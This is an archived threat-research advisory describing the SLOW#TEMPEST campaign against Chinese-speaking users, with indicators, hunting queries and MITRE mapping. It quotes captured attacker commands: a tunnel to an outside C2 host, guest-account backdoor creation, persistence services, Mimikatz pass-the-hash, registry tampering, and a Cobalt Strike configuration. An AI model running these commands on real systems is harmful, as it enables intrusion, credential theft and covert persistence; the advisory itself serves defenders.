{
	"id": "f6624c18-c2cc-493f-9b5b-d92603205bcf",
	"created_at": "2026-04-06T00:07:47.375415Z",
	"updated_at": "2026-04-10T03:24:23.579401Z",
	"deleted_at": null,
	"sha1_hash": "600f602047ed16b7d8d484e3b57b0bf336c01f2a",
	"title": "From Cobalt Strike to Mimikatz: A Deep Dive into the SLOW#TEMPEST Campaign Targeting Chinese Users",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 4861070,
	"plain_text": "From Cobalt Strike to Mimikatz: A Deep Dive into the\r\nSLOW#TEMPEST Campaign Targeting Chinese Users\r\nArchived: 2026-04-05 19:40:26 UTC\r\nSecuronix Threat Research Security Advisory\r\nBy Securonix Threat Research: Den Iuzvyk, Tim Peck\r\nAug 29, 2024\r\ntldr:\r\nThe Securonix Threat Research team has uncovered a covert campaign targeting Chinese-speaking users with Cobalt\r\nStrike payloads likely delivered through phishing emails. The attackers managed to move laterally, establish persistence\r\nand remain undetected within the systems for more than two weeks.\r\nIn a recent attack campaign identified by Securonix threat researchers as SLOW#TEMPEST, malicious ZIP files are\r\nbeing distributed with the intent to deploy Cobalt Strike implants on targeted systems.\r\nThe campaign appears to specifically target victims within China, as evidenced by the file names and lures which are\r\npredominantly written in Chinese. Moreover, all of the command and control (C2) infrastructure used by the threat actors\r\nwas hosted in China by Shenzhen Tencent Computer Systems Company Limited, a Chinese-owned company. A\r\ndetailed look at telemetry data from the malicious samples indicates that the majority of the malware and files involved\r\noriginated from within China, further reinforcing the likelihood that China is indeed the primary target of this attack.\r\nRegarding the origin of the attack, we were unable to reach a definitive conclusion. Additionally, while we could not\r\nprecisely determine the attack vector, it appears to align with traditional phishing email tactics. 
In the case of\r\nSLOW#TEMPEST, it is likely that ZIP files (which were sometimes password-protected) were distributed via\r\nunsolicited emails.\r\nhttps://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/\r\nPage 1 of 16\n\n…\r\nWithin a timeline of more than two weeks, we were able to track the threat actors’ movements as they were able to\r\nescalate privileges, move laterally to other systems and establish persistence on each compromised host. We’ll highlight\r\neach of these tactics within this advisory.\r\nInitial infection\r\nCode execution begins through a shortcut (.lnk) file contained within a compressed archive (.zip) file. We analyzed a few\r\nsamples, one of which was “20240739人员名单信息.zip” which translates to: Personnel list information.\r\nSome samples such as the file mentioned above were password protected. This was a common tactic with Qakbot threat\r\nactors, where the password was supplied inside the body of the phishing email. Encrypting the zip file contents ensures\r\nthat email-based antivirus software would be unable to properly examine and flag any of the contained contents.\r\nOnce the zip file is opened and the password is supplied (if needed), the user is presented with a single LNK file\r\nmasquerading as a .docx file. One example contained a shortcut file named “违规远程控制软件人员名单.docx.lnk”\r\nwhich roughly translates to “List of people who violated the remote control software regulations”.\r\nGiven the language used in the lure files, it’s likely that specific Chinese-related business or government sectors\r\ncould be targeted as they would both employ individuals who follow “remote control software regulations”.\r\nLure file \u0026 initial code analysis\r\nWhen the user executes the malicious LNK file, our code execution begins. It starts by running an executable file\r\ncontained within a rather odd directory structure containing references to “MACOS” metadata files. 
The first directory\r\nmasked by “????” is named “其他信息” which translates to “Additional Information”.\r\nIt appears that the LNK file has its icon set to a 1.docx from within the same directory, however this file was not present\r\nwithin any of the zip files that we analyzed. This caused the file to appear as a blank or empty icon to the user.\r\nFigure 1: Analysis of 违规远程控制软件人员名单.docx.lnk\r\nThe odd directory structure can be seen in the figure below after running the “tree” command from within the parent\r\ndirectory.\r\nHidden are two files referenced by the LNK file: dui70.dll and UI.exe:\r\nFigure 2: Output of the “tree” command upon the extracted zip file contents\r\nDLL hijacking and Cobalt Strike implant execution\r\nLocated within the “\\其他信息\\.__MACOS__\\._MACOS_\\__MACOSX\\_MACOS_” directory are two files: dui70.dll\r\nand UI.exe. The file UI.exe is a legitimate signed executable by Microsoft which has been renamed from\r\nLicensingUI.exe.\r\nLicensingUI.exe is a legitimate system file in Windows which is responsible for displaying the user interface related to\r\nsoftware licensing and activation. The legitimate file is designed to import several legitimate DLL files, one of which is\r\ndui70.dll and should normally reside in C:\\Windows\\System32. However, thanks to a DLL path traversal vulnerability,\r\nany DLL containing the same name can be sideloaded upon the execution of the renamed UI.exe by the LNK file.\r\nAt the time of publication, this DLL sideloading or hijacking technique involving LicensingUI.exe appears to be\r\nunreported. 
Details regarding the binary file “UI.exe” and certificate validation can be found in the figure below:\r\nFigure 3: Cobalt Strike (DLL) and UI.exe (legitimate) file execution.\r\nThe DLL file is a Cobalt Strike implant which allows the attacker persistent and stealthy access to the system. We were\r\nable to extract its configuration and the details can be seen in Appendix A towards the end of this publication. In\r\nsummary, it’s programmed to beacon out to hxxp://123.207.74[.]22/mall_100_100.html over port 11443.\r\nThe beacon uses obfuscated network traffic described by the “Malleable_C2_Instructions” (Appendix A) and relies on\r\ncommon evasion techniques such as removing specific byte segments to bypass network-based detections.\r\nThe Cobalt Strike implant is programmed to inject itself into the Windows binary “runonce.exe”. This produced a process\r\nchain as seen in the any.run process tree below:\r\nFigure 4: Cobalt Strike process chain\r\nWith the attackers hooked into the runonce.exe process, our team was able to observe much of the initial staging and\r\nenumeration activity.\r\nPost-Exploitation – Attackers’ hands on keyboard\r\nNow that the attackers had complete control over the target host, we observed initial post-exploitation activity which\r\nconsisted of setting up a staging directory, and downloading additional enumeration and attack tools to the host.\r\nFirst, the attackers created the following directory to stage from: C:\\Windows\\Temp\\tmp\r\nNext, several binary files were downloaded into the directory:\r\nfpr.exe: Unknown executable\r\niox.exe: A tool for port forwarding and setting up proxied connections\r\nfscan.exe: A well-known scanner in red teaming for identifying live hosts and open ports. 
The output file is\r\n“result.txt”\r\nnetspy.exe: A network reconnaissance tool used for capturing network traffic or scanning for network\r\nvulnerabilities. The log files are netspy.log and alive.txt\r\nlld.exe: A shellcode loader binary which in our case loaded and executed raw shellcode saved in:\r\nC:/Windows/Temp/tmp/tmp.log\r\nxxx.txt: Same as tmp.log before it was renamed\r\ntmp.log: A file containing shellcode to be executed by lld.exe\r\nsharpdecryptpwd.exe: A command-line based utility that collects and dumps cached credentials from installed\r\napplications such as Navicat, TeamViewer, FileZilla, WinSCP and Xmanager\r\npvefindaduser.exe: Used for Windows Active Directory (AD) user enumeration.\r\nnew text document.txt: unknown – we were not able to capture this file\r\ngogo_windows_amd64.exe: Seems related to an open source project “Nemo” which automates enumeration tools\r\nsuch as Nmap, Masscan and many others. Outputs “.sock.lock” and “output.txt” files.\r\nEach of these utilities or tools was executed by the attacker in series. The network port forwarding and tunneling utility\r\n“iox.exe” was used to establish tunnels with external infrastructure (49.235.152[.]72:8282), enabling them to exfiltrate\r\ncaptured enumeration information and other data out of the compromised network.\r\nPrivilege Escalation and Persistence\r\nThe attackers managed to maintain persistent access to the compromised environment by creating a scheduled task named\r\n“windowsinspectionupdate.” This task is designed to execute a malicious executable “lld.exe” at regular intervals. The\r\n“lld.exe” file is a key component in the attackers’ toolkit, specifically used to execute shellcode, which can run arbitrary\r\ncode directly in memory. 
Its stealthy nature makes it effective at bypassing traditional security controls.\r\nBy scheduling this task, the attackers ensure that “lld.exe” is executed repeatedly, allowing them to re-establish or\r\nmaintain control over the compromised system even after reboots or network disruptions. This persistence mechanism is\r\nparticularly effective because it can survive system restarts, making it difficult to completely remove the attacker’s\r\nfoothold without identifying and deleting the scheduled task.\r\nThe executed command set by task scheduler is:\r\ncmd /c start c:/windows/temp/tmp/lld.exe c:/windows/temp/tmp/tmp.log\r\nUser and group modification\r\nThe attackers further enabled themselves to hide in the weeds in compromised systems by manually elevating the\r\nprivileges of the built-in Guest user account. This account, typically disabled and minimally privileged, was transformed\r\ninto a powerful access point by adding it to the critical administrative group and assigning it a new password.\r\ncmd.exe /c net user guest\r\ncmd.exe /c net localgroup administrators guest /add\r\ncmd.exe /c net localgroup “remote desktop users” guest /add\r\ncmd.exe /c net user guest 1qaz@wsx\r\ncmd.exe /c net user guest\r\ncmd.exe /c net user guest /active:yes\r\ncmd.exe /c net user guest\r\nThe attacker’s manipulation of the Guest account significantly increases the security risks to the system. By converting a\r\nlow-privilege, usually disabled account into one with administrative and remote access capabilities, the attacker has\r\ncreated a powerful backdoor that can be easily overlooked. 
This backdoor allows them to maintain access to the system\r\nwith minimal detection, as the Guest account is often not monitored as closely as other user accounts.\r\nNext, the attackers launched network scans, mostly through the “iox.exe” utility, identifying and probing additional\r\ninternal systems (e.g., MSSQL servers and specific subnets).\r\nPersistence through Windows services\r\nThe attackers further ensured their persistence within the compromised environment by manually executing a series of\r\ncommands to install a malicious service. This service, named “windowsinspectionupdate,” was specifically designed to\r\nrun a single executable “lld.exe” with a single file as input “tmp.log” each time the system starts up. If you recall, the\r\npurpose of this executable is to execute a shellcode file. This technique allows the attacker to maintain ongoing access to\r\nthe compromised system even after it is rebooted or encounters other interruptions.\r\nThe service was observed being created using the following sequence of commands:\r\ncmd.exe /c start /b lld.exe xxx.txt\r\ncmd.exe /c move xxx.txt tmp.log\r\ncmd.exe /c sc create “windowsinspectionupdate” binpath= “cmd /c start c:/windows/temp/tmp/lld.exe\r\nc:/windows/temp/tmp/tmp.log”\r\ncmd.exe /c sc description windowsinspectionupdate “windows inspection integrity”\r\ncmd.exe /c sc config windowsinspectionupdate start= auto\r\nLateral movement and credential harvesting\r\nThe attackers moved laterally across the network primarily by using RDP (Remote Desktop Protocol). They first\r\nmade several unsuccessful login attempts to other systems using the user account that was initially compromised.\r\nEventually, a successful RDP connection was established from the hostname to another domain-joined server. Once\r\ninside, they launched multiple reconnaissance and scanning tools such as fscan.exe and netspy.exe. 
According to the\r\nintercepted results text file output by the tools, five hosts had open ports that the attackers began enumerating.\r\nThey also used credential theft tools like sharpdecryptpwd.exe to extract stored credentials from browsers (Chrome\r\nbrowser in this attack chain). Stored credentials in the browser were then used to authenticate and pivot across the\r\nnetwork into other systems.\r\ncmd.exe /c sharpdecryptpwd.exe chrome\r\nWe observed the Windows credential dumping utility Mimikatz being used from the Cobalt Strike process “lld.exe”. In\r\naddition, the attackers attempted to pass the hash as one of the captured users and hash combinations. The user targeted\r\nthe mstsc.exe process which is the executable for Microsoft’s Remote Desktop Connection tool. The following captured\r\ncommand initiates an RDP session as the targeted user. The use of the /restrictedadmin flag ensures that the user’s\r\ncredentials will not be sent over the network, which may reduce network-based detections.\r\nsekurlsa::pth /user:[REDACTED] /domain:[REDACTED] /ntlm:[REDACTED] “/run:mstsc.exe /restrictedadmin”\r\nIn another attempt to move laterally, the harvested credentials from mimikatz were used. Also, through the Cobalt Strike\r\nimplant the attackers first attempted to authenticate as the administrator user by passing the hash against a list of gathered\r\nIP addresses contained inside an ip.txt file.\r\ncrackmapexec smb ip.txt -u [REDACTED_DOMAIN]/Administrator -H [REDACTED_HASH]\r\nA short time later we observed psexec.py being used to target specific IP addresses:\r\npython3 psexec.py [REDACTED_USER]@[REDACTED_IP] -hashes [REDACTED_HASH] -codec gbk\r\nDisable “Restricted Admin Mode” in LSA\r\nInitially, the attackers used RDP to establish internal remote connections. 
As they moved laterally, they executed registry\r\ncommands to disable the “Restricted Admin Mode” by setting the disablerestrictedadmin value to 0 in the Windows\r\nRegistry. Restricted Admin Mode is a security feature introduced in newer versions of Windows that limits credential\r\nexposure when connecting to a remote system via Remote Desktop Protocol (RDP).\r\ncmd.exe /c reg add “HKLM\\System\\CurrentControlSet\\control\\lsa” /v disablerestrictedadmin /t reg_dword /d 00000000\r\n/f\r\nThe change was then verified using the command:\r\ncmd.exe /c reg query “hklm\\system\\currentcontrolset\\control\\lsa” | findstr “disablerestrictedadmin”\r\nRe-establish remote connections\r\nOnce the attackers pivoted successfully into other systems, iox.exe was used to establish another remote connection back\r\nto their C2 server:\r\ncmd.exe /c start /b iox.exe proxy -r *49.235.152[.]72:8282 -k 616161\r\nBloodhound for domain enumeration\r\nAs part of the post-exploitation/lateral movement phase, the attackers deployed BloodHound, a powerful tool used for\r\nActive Directory (AD) reconnaissance. BloodHound is designed to map out and analyze relationships within an AD\r\nenvironment, giving the attackers detailed data to identify and exploit potential pathways for privilege escalation and\r\nlateral movement.\r\nDuring the course of the SLOW#TEMPEST campaign, BloodHound was executed via the runonce.exe process, which if\r\nyou remember was the target or exit process from Cobalt Strike. Once deployed, BloodHound collected extensive data on\r\nthe AD environment, including information on users, computers, groups, organizational units, group policy objects, and\r\nother domain component information.\r\nThe data collected by BloodHound was then compiled into several .json files providing a detailed map of the AD\r\nstructure. These files were subsequently compressed into a BloodHound.zip archive. 
Once exfiltrated, the attackers are\r\nable to analyze the data in detail on their own systems.\r\nAdditional enumeration commands\r\nThese commands were captured on several systems. The attackers used a mix of built-in Windows utilities such as ping,\r\nnetstat and tasklist, for example, to scan or probe their environment. The Chinese-based public IP information website\r\n(hxxp://myip[.]ipip.net) was also probed using “curl” to grab the system’s public IP address.\r\nGeneral system enumeration commands\r\ncmd.exe /c ipconfig\r\ncmd.exe /c wevtutil cl “windows powershell”\r\ncmd.exe /c ping [REDACTED]\r\ncmd.exe /c tasklist /svc\r\ncmd.exe /c systeminfo\r\ncmd.exe /c net time /domain\r\ncmd.exe /c ping dc.[REDACTED] -c 2\r\ncmd.exe /c net\r\ncmd.exe /c net user /domain\r\ncmd.exe /c net user [REDACTED] /domain\r\ncmd.exe /c start /b fpr.exe\r\ncmd.exe /c netstat -ano\r\ncmd.exe /c whoami\r\ncmd.exe /c fpr.exe\r\ncmd.exe /c ping 123.56.168[.]30\r\ncmd.exe /c net user [REDACTED] /domain\r\nnet1  user [REDACTED] /domain\r\ncmd.exe /c netstat -ano | findstr 3398\r\nnetstat  -ano |findstr  established\r\nProxy connection using iox.exe\r\ncmd.exe /c start /b iox.exe proxy -r *49.235.152[.]72:8282 -k 616161\r\ncmd.exe /c curl hxxp://myip.ipip[.]net\r\nExecute shellcode, move the file for new service\r\ncmd.exe /c start /b lld.exe xxx.txt\r\ncmd.exe /c move xxx.txt tmp.log\r\nEnumerate local subnet using fscan.exe\r\ncmd.exe /c fscan.exe  -h [REDACTED]/24\r\ncmd.exe /c fscan.exe  -hf alive.txt\r\nFind AD users\r\npvefindaduser.exe  -current -noping -os\r\nNemo network enumeration\r\ngogo_windows_amd64.exe  -i [REDACTED]/24 -p all -f output.txt\r\ngogo_windows_amd64.exe  -i [REDACTED]/24 -p 445 -f output.txt\r\ngogo_windows_amd64.exe\r\ngogo_windows_amd64.exe  [REDACTED]/24 -p 
445\r\ngogo_windows_amd64.exe  -i [REDACTED]/24 -p 445\r\nAttacker infrastructure analysis\r\nWhile the attack was ongoing, we were able to observe key details of the attack. Some of these included OPSEC\r\n(Operational Security) failures from the attackers. One example was capturing Cobalt Strike commands. We observed\r\nseveral instances where some of these OPSEC failures resulted in providing us with unintended details regarding\r\nusernames and system information as to the attacker’s infrastructure. For example, take the following captured Cobalt\r\nStrike command:\r\nexecute-assembly /Users/apple/Desktop/C++/sb.exe -e hxxps://360-1305242994.cos.ap-nanjing.myqcloud[.]com/wel/ns/sa64.gif -s c:\\\\windows\\\\system32\\\\runonce.exe -a “browser -b all -z” --disable-bypass-cmdline --disable-bypass-amsi --disable-bypass-etw\r\nThe command captured from the attacker provides insight into the execution of a payload using Cobalt Strike’s execute-assembly module. A binary was passed in from “/Users/apple/Desktop/C++/sb.exe” which indicates that according to the\r\ndirectory structure, the attacker was running Cobalt Strike from a macOS environment. This isn’t technically new as there\r\nhas been observed activity back as far as 2022 through Geacon.\r\nThe sb.exe process appears to be a compiled version of SharpBlock, an open source tool which allows for bypassing EDR\r\nand Microsoft’s Anti-Malware Scan Interface (AMSI), to implant specified processes controlled by the attacker. 
The\r\nsa64.gif is a renamed copy of searchall64.exe, an open source utility named searchall which is designed to search for\r\nsensitive information on the target machine including usernames, passwords, account details.\r\nFrom within the same Cobalt Strike session we observed file execution from the following local path which provided us\r\nwith another username, this time “guoyansong”, which could be short for Guoyan Song, a valid first and last name in\r\nChinese.\r\n/Users/guoyansong/D/gongju/????/??????/????/SharpWeb.exe\r\nLastly, all of the IP addresses were hosted in China via Shenzhen Tencent Computer Systems Company Limited. The\r\npayload hosted at 360-1305242994.cos.ap-nanjing.myqcloud[.]com, is also hosted by the Chinese company Tencent, via\r\na Tencent Cloud Object Storage (COS) resource.\r\nWrapping up…\r\nThe discovery of the SLOW#TEMPEST campaign by the Securonix threat research team reveals a highly organized and\r\nsophisticated attack targeting Chinese-speaking users. Although there was no solid evidence linking this attack to any\r\nknown APT groups, it is likely orchestrated by a seasoned threat actor who had experience using advanced exploitation\r\nframeworks such as Cobalt Strike and a wide range of other post-exploitation tools. 
The campaign’s complexity is evident\r\nin its methodical approach to initial compromise, persistence, privilege escalation and lateral movement across the\r\nnetwork.\r\nThe use of undocumented DLL injection techniques, such as exploiting the Microsoft-signed executable LicensingUI.exe\r\nand deploying BloodHound for Active Directory reconnaissance, exemplifies the advanced nature of this attack.\r\nAdditionally, the careful steps taken by the threat actor to ensure persistence through the creation of scheduled tasks and\r\nelevation of user privileges highlight the attackers’ intent to maintain long-term control over the targeted systems, which\r\nin this case lasted over two weeks.\r\nSecuronix recommendations\r\nThe key indicators of compromise identified in this investigation serve as critical data points for security teams aiming to\r\ndetect and respond to similar threats in their environments. By understanding the methods and tools used by attackers in\r\nthis campaign, defenders can better prepare to protect their networks from these advanced persistent threats.\r\nAs this campaign likely started using phishing emails, avoid downloading files or attachments from external\r\nsources, especially if the source was unsolicited. Common file types include zip, rar, iso, and pdf. Zip files,\r\nsometimes password protected, were used during this campaign.\r\nMonitor common malware staging directories, especially script-related activity in world-writable directories. In\r\nthe case of this campaign the threat actors staged in subdirectories in C:\\ProgramData, C:\\Windows\\Temp as well\r\nas the user’s %APPDATA% directory.\r\nThrough various phases of the SLOW#TEMPEST campaign, the threat actors leveraged encrypted channels over\r\nvarious ports to evade detection. Because of this, we strongly recommend deploying robust endpoint logging\r\ncapabilities. 
This includes leveraging additional process-level logging such as Sysmon and PowerShell logging for\r\nadditional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics Techniques\r\nInitial Access\r\nT1078.001: Valid Accounts: Default Accounts\r\nT1566.001: Phishing: Spearphishing Attachment\r\nCollection T1560: Archive Collected Data\r\nCommand and Control T1132: Data Encoding\r\nCredential Access\r\nT1003: OS Credential Dumping\r\nT1555: Credentials from Password Stores\r\nDefense Evasion\r\nT1070.004: Indicator Removal: File Deletion\r\nT1562.001: Impair Defenses: Disable or Modify Tools\r\nT1574.001: Hijack Execution Flow: DLL Search Order Hijacking\r\nT1620: Reflective Code Loading\r\nDiscovery\r\nT1033: System Owner/User Discovery\r\nT1057: Process Discovery\r\nT1069: Permission Groups Discovery: Domain Groups\r\nT1082: System Information Discovery\r\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.006: Command and Scripting Interpreter: Python\r\nT1569.002: System Services: Service Execution\r\nT1204.001: User Execution: Malicious Link\r\nT1204.002: User Execution: Malicious File\r\nLateral Movement\r\nT1021.001: Remote Services: Remote Desktop Protocol\r\nT1550.002: Use Alternate Authentication Material: Pass the Hash\r\nPersistence T1053: Scheduled Task/Job\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nRelevant Securonix detections\r\nEDR-ALL-923-RU\r\nEDR-ALL-950-RU\r\nEDR-ALL-984-RU\r\nEDR-ALL-975-RU\r\nEDR-ALL-1023-RU\r\nEDR-ALL-1057-RU\r\nEDR-ALL-1294-RU\r\nEDR-ALL-1301-RU\r\nEDR-ALL-1306-RU\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP 
addresses or URLs)\r\nindex = activity AND rg_functionality = “Web Proxy” AND (destinationaddress = “123.207.74[.]22” OR\r\ndestinationaddress = “123.56.168[.]30” OR destinationaddress = “49.235.152[.]72”)\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND (destinationhostname CONTAINS\r\n“myip.ipip[.]net” OR destinationhostname CONTAINS “360-1305242994.cos.ap-nanjing.myqcloud[.]com” )\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network\r\nconnection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND\r\n(destinationport=”11443″ OR destinationport=”8282″)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “File created”\r\nOR deviceaction = “File created (rule: FileCreate)”) AND customstring49 STARTS WITH\r\n“C:\\Windows\\Temp\\tmp”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create”\r\nOR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction\r\n= “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND customstring49\r\nSTARTS WITH “C:\\Windows\\Temp\\tmp”\r\nC2 and infrastructure\r\nC2 Address\r\n123.207.74[.]22\r\n123.56.168[.]30\r\n49.235.152[.]72\r\nmyip.ipip[.]net\r\n360-1305242994.cos.ap-nanjing.myqcloud[.]com/wel/ns/sa64.gif\r\nAnalyzed files/hashes\r\nFile Name SHA256\r\nArchive.zip (renamed) 8e77101d3f615a58b8d759e8b82ca3dffd4823b9f72dc5c6989bb4311bdffa86\r\nArchive.zip (renamed) 04bcf25d07e5cf060e742325d6123242f262888705acac649f8d5010a5eb6a87\r\nArchive.zip (renamed) c35ea8498ed7ae33513e26fac321fecf0fc9306dda8c783904968e3c51648c37\r\n20240739人员名单信息.zip 3a9b64a61f6373ee427f27726460e7047b21ddcfd1d0d45ee4145192327a0408\r\n╠Õ╝ý▒¿©µ.lnk 28030E8CF4C9C39665A0552E82DA86781B00F099E240DB83F1D1A3AE0E990AB6\r\n违规远程控制软件人员名单.docx.lnk 1BA77DD1F5BF31D45FDB160C52EBE5829EC373350CDE35818FB90D45352B3601\r\ndui70.dll 
1189D34E983A6FC9D2DC37AD591287C9E3E4D4BA83F66C7EDE692C36274BA648\r\ngogo_windows_amd64.exe 706BD7E05F275814C3B86EEC1A87148662029D91D0CE9B80386AAFFE7AA3753B\r\niox.exe C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731\r\nLLD.exe 0BD048E0BCE956EDFBCEE6EDF32B8B67E08275BD38125B40A98665FAB4926C9D\r\nnetspy.exe 97C5CD06B543B0BDB270666092348EFBA0A9670AF05B11F3B56BF4B418DEC43A\r\nPVEFindADUser.exe 7DC0E13A5F1A70C4E41F4B92372259B050A395104650D57385ECAA148481AE5C\r\nfpr.exe 1F510DED0D181B4636E83C69B66C92465DC0E64F6DB946FA4C246E7741F66141\r\nsharpdecryptpwd.exe 9F650117288B26312E84F32E23783FE3C81FCBA771C8AE58119BE92344C006CC\r\npvefindaduser.exe 7DC0E13A5F1A70C4E41F4B92372259B050A395104650D57385ECAA148481AE5C\r\ntmp.log EFE53F18D282516149BC6FEAC44C17DDE9F0704D95598AECBA3E7D734727B07E\r\nsa64.gif 33A910162EAFE750316ADFAD4AB0955BE24C1BA048C2EC236C95E4A795C42932\r\nReferences\r\n1. QakBot Malware Bypass Windows Security Using Unpatched Vulnerability\r\nhttps://blog.eclecticiq.com/qakbot-malware-used-unpatched-vulnerability-to-bypass-windows-os-security-feature\r\n2. HackTricks: Dll Hijacking\r\nhttps://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dll-hijacking\r\n3. 
Geacon Brings Cobalt Strike Capabilities to macOS Threat Actors\r\nhttps://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/\r\nAppendix A: Cobalt Strike Configuration\r\n{\r\n  “BeaconType”: [\r\n      “HTTP”\r\n  ],\r\n  “Port”: 11443,\r\n  “SleepTime”: 10000,\r\n  “MaxGetSize”: 6148882,\r\n  “Jitter”: 37,\r\n  “C2Server”: “123.207.74[.]22,/mall_100_100.html”,\r\n  “HttpPostUri”: “/ajax/recharge/recharge.json”,\r\n  “Malleable_C2_Instructions”: [\r\n      “Remove 2085 bytes from the end”,\r\n      “Remove 2085 bytes from the beginning”,\r\n      “Remove 712 bytes from the beginning”,\r\n      “NetBIOS decode ‘a’”\r\n  ],\r\n  “HttpGet_Verb”: “GET”,\r\n  “HttpPost_Verb”: “POST”,\r\n  “HttpPostChunk”: 0,\r\n  “Spawnto_x86”: “%windir%\\\\syswow64\\\\runonce.exe”,\r\n  “Spawnto_x64”: “%windir%\\\\sysnative\\\\runonce.exe”,\r\n  “CryptoScheme”: 0,\r\n  “Proxy_Behavior”: “Use IE settings”,\r\n  “Watermark”: 666666666,\r\n  “bStageCleanup”: “True”,\r\n  “bCFGCaution”: “True”,\r\n  “KillDate”: 0,\r\n  “bProcInject_StartRWX”: “False”,\r\n  “bProcInject_UseRWX”: “False”,\r\n  “bProcInject_MinAllocSize”: 18700,\r\n  “ProcInject_PrependAppend_x86”: [\r\n      “kJCQkA==”,\r\n      “kJCQkA==”\r\n  ],\r\n  “ProcInject_PrependAppend_x64”: [\r\n      “kJCQkA==”,\r\n      “kJCQkA==”\r\n  ],\r\n  “ProcInject_Execute”: [\r\n      “CreateThread”,\r\n      “SetThreadContext”,\r\n      “NtQueueApcThread-s”,\r\n      “RtlCreateUserThread”,\r\n      “kernel32.dll:LoadLibraryA”\r\n  ],\r\n  “ProcInject_AllocationMethod”: “VirtualAllocEx”,\r\n  “bUsesCookies”: “True”,\r\n  “HostHeader”: “”\r\n}\r\nSource: https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.securonix.com/blog/from-cobalt-strike-to-mimikatz-slowtempest/"
	],
	"report_names": [
		"from-cobalt-strike-to-mimikatz-slowtempest"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434067,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/600f602047ed16b7d8d484e3b57b0bf336c01f2a.pdf",
		"text": "https://archive.orkl.eu/600f602047ed16b7d8d484e3b57b0bf336c01f2a.txt",
		"img": "https://archive.orkl.eu/600f602047ed16b7d8d484e3b57b0bf336c01f2a.jpg"
	}
}